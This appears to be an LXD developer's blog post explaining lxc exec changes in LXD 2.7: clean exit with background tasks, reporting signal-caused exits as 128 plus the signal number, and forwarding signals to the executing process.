A long-standing problem was certainly how to correctly handle background tasks. Here’s an asciinema illustration of the problem with a pre LXD 2.7 instance:

asciicast

What you can see there is that putting a task in the background will lead to lxc exec not being able to exit. A lot of command sequences can trigger this problem:

chb@conventiont|~
> lxc exec zest1 bash
root@zest1:~# yes &
y
y
y
.
.
.

Nothing would save you now. yes will simply write to stdout till the end of time as quickly as it can… The root of the problem lies with stdout being kept open which is necessary to ensure that any data written by the process the user has started is actually read and sent back over the websocket connection we established. As you can imagine this becomes a major annoyance when you e.g. run a shell session in which you want to run a process in the background and then quickly want to exit. Sorry, you are out of luck. Well, you were. The first, and naive approach is obviously to simply close stdout as soon as you detect that the foreground program (e.g. the shell) has exited. Not quite as good as an idea as one might think… The problem becomes obvious when you then run quickly executing programs like:

lxc exec -- ls -al /usr/lib

where the lxc exec process (and the associated forkexec process (Don’t worry about it now. Just remember that Go + setns() are not on speaking terms…)) exits before all buffered data in stdout was read. In this case you will cause truncated output and no one wants that. After a few approaches to the problem that involved, disabling pty buffering (Wasn’t pretty I tell you that and also didn’t work predictably.) and other weird ideas I managed to solve this by employing a few poll() “tricks” (In some sense of the word “trick”.). Now you can finally run background tasks and cleanly exit. To wit: asciicast

2. Reporting exit codes caused by signals

ssh is a wonderful tool. One thing however, I never really liked was the fact that when the command that was run by ssh received a signal ssh would always report -1 aka exit code 255. This is annoying when you’d like to have information about what signal caused the program to terminate. This is why I recently implemented the standard shell convention of reporting any signal-caused exits using the standard convention 128 + n where n is defined as the signal number that caused the executing program to exit. For example, on SIGKILL you would see 128 + SIGKILL = 137 (Calculating the exit codes for other deadly signals is left as an exercise to the reader.). So you can do:

chb@conventiont|~
> lxc exec zest1 sleep 100

Now, send SIGKILL to the executing program (Not to lxc exec itself, as SIGKILL is not forwardable.):

kill -KILL $(pidof sleep 100)

and finally retrieve the exit code for your program:

chb@conventiont|~
> echo $?
137

Voila. This obviously only works nicely when a) the exit code doesn’t breach the 8-bit wall-of-computing and b) when the executing program doesn’t use 137 to indicate success (Which would be… interesting(?).). Both arguments don’t seem too convincing to me. The former because most deadly signals should not breach the range. The latter because (i) that’s the users problem, (ii) these exit codes are actually reserved (I think.), (iii) you’d have the same problem running the program locally or otherwise. The main advantage I see in this is the ability to report back fine-grained exit statuses for executing programs. Note, by no means can we report back all instances where the executing program was killed by a signal, e.g. when your program handles SIGTERM and exits cleanly there’s no easy way for LXD to detect this and report back that this program was killed by signal. You will simply receive success aka exit code 0.

3. Forwarding signals

This is probably the least interesting (or maybe it isn’t, no idea) but I found it quite useful. As you saw in the SIGKILL case before, I was explicit in pointing out that one must send SIGKILL to the executing program not to the lxc exec command itself. This is due to the fact that SIGKILL cannot be handled in a program. The only thing the program can do is die… like right now… this instance… sofort… (You get the idea…). But a lot of other signals SIGTERM, SIGHUP, and of course SIGUSR1 and SIGUSR2 can be handled. So when you send signals that can be handled to lxc exec instead of the executing program, newer versions of LXD will forward the signal to the executing process. This is pretty convenient in scripts and so on.

In any case, I hope you found this little lxc exec post/rant useful. Enjoy LXD it’s a crazy beautiful beast to play with. Give it a try online https://linuxcontainers.org/lxd/try-it/ and for all you developers out there: Checkout https://github.com/lxc/lxd and send us patches. :) We don’t require any CLA to be signed, we simply follow the kernel style of requiring a Signed-off-by line. :)

Read more